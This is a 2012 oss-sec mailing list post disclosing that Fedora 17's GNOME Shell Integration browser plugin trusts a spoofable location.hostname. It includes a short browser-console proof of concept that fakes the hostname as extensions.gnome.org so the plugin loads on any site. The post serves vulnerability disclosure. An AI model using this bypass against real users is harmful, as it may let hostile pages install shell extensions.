oss-sec mailing list archives

note on gnome shell extensions

From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Sun, 9 Sep 2012 00:36:26 +0200

List, I just installed Fedora 17 on a workstation. While researching how to
upgrade gnome 3 to version 2, I noticed it installed a browser extension
called "Gnome Shell Integration".

$ rpm -qf /usr/lib64/mozilla/plugins/libgnome-shell-browser-plugin.so
gnome-shell-3.4.1-5.fc17.x86_64

The NPPVpluginDescriptionString states "It can be used only by
extensions.gnome.org", but I happen to know that is a tricky thing to get
right.

102   if (!funcs.getproperty (instance, NPVARIANT_TO_OBJECT (document),
103                           funcs.getstringidentifier ("location"),
104                           &location))
105     goto out;
106 
107   if (!NPVARIANT_IS_OBJECT (location))
108     goto out;
109 
110   hostname = get_string_property (instance,
111                                   NPVARIANT_TO_OBJECT (location),
112                                   "hostname");
113 
114   if (g_strcmp0 (hostname, ORIGIN))
115     {
116       g_debug ("origin does not match, is %s",
117                hostname);
118 
119       goto out;
120     }

I'm familiar with this topic as I wrote a tool for managing broken but
necessary plugins by restricting them to trusted domains.

http://code.google.com/p/nssecurity

As far as I know, browsers only attempt to prevent tampering with
document.location.href, anything else can be modified. For example, this
works in Chrome, I don't know the syntax for Mozilla:

location.__defineGetter__("hostname", function () { return "arbitrary"; })

  undefined

location.hostname

  "arbitrary"

However,

location.__defineGetter__("href", function () { return "arbitrary"; })

  undefined

location.href

  "http://realurl.test/asdasd";

So this should fail:

o = document.createElement('OBJECT')

  <object>?</object>?

o.setAttribute('TYPE', 'application/x-gnome-shell-integration')

  undefined

document.body.appendChild(o)

  <object type=?"application/?x-gnome-shell-integration">?</object>?

o.shellVersion

  undefined

But we can re-insert it and make it work:

document.body.removeChild(o)

  <object type=?"application/?x-gnome-shell-integration">?</object>?

location.__defineGetter__("hostname", function () { return

"extensions.gnome.org"; })
  undefined

document.body.appendChild(o)

  <object type=?"application/?x-gnome-shell-integration">?</object>?

o.shellVersion

  "3.4.1"

document.location.href

  "https://www.redhat.com/";

The plugin incorrectly trusted hostname, and initialized. As far as I can
tell, the plugin will let you install new shell extensions, I don't know
what the impact of that is, can they contain native code?

Tavis.

-- 
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------

Current thread:

note on gnome shell extensions Tavis Ormandy (Sep 08)
- Re: note on gnome shell extensions Kurt Seifried (Sep 08)
  - Re: note on gnome shell extensions Vincent Danen (Sep 10)
    - Re: note on gnome shell extensions Tavis Ormandy (Sep 13)
    - Re: note on gnome shell extensions Marcus Meissner (Sep 13)
    - Re: note on gnome shell extensions Vincent Danen (Sep 13)
    - Re: note on gnome shell extensions Tavis Ormandy (Sep 13)
    - Re: Re: note on gnome shell extensions Vincent Danen (Sep 13)
    - Re: Re: note on gnome shell extensions Kurt Seifried (Sep 13)
    - Re: Re: note on gnome shell extensions Vincent Danen (Sep 17)
    - Re: Re: note on gnome shell extensions Sebastian Krahmer (Sep 17)

(Thread continues...)